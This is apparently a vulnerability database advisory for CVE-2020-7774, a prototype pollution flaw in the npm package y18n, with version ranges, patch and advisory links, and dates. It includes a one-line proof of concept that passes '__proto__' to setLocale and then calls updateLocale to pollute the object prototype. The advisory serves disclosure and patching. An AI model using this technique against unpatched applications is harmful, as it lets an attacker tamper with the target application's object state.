This affects the package y18n before 3.2.2, 4.0.1 and 5.0.5. PoC by po6ix: const y18n = require('y18n')(); y18n.setLocale('__proto__'); y18n.updateLocale({polluted: true}); console.log(polluted); // true
References
| Link | Resource |
|---|---|
| https://github.com/yargs/y18n/issues/96 | Exploit Third Party Advisory |
| https://github.com/yargs/y18n/pull/108 | Patch Third Party Advisory |
| https://snyk.io/vuln/SNYK-JS-Y18N-1021887 | Exploit Third Party Advisory |
| https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038306 | Exploit Third Party Advisory |
| https://www.oracle.com/security-alerts/cpuApr2021.html |
Configurations
Configuration 1 (hide)
|
Information
Published : 2020-11-17 13:15
Updated : 2021-07-21 11:39
NVD link : CVE-2020-7774
Mitre link : CVE-2020-7774
JSON object : View
Products Affected
y18n_project
- y18n
CWE
CWE-20
Improper Input Validation
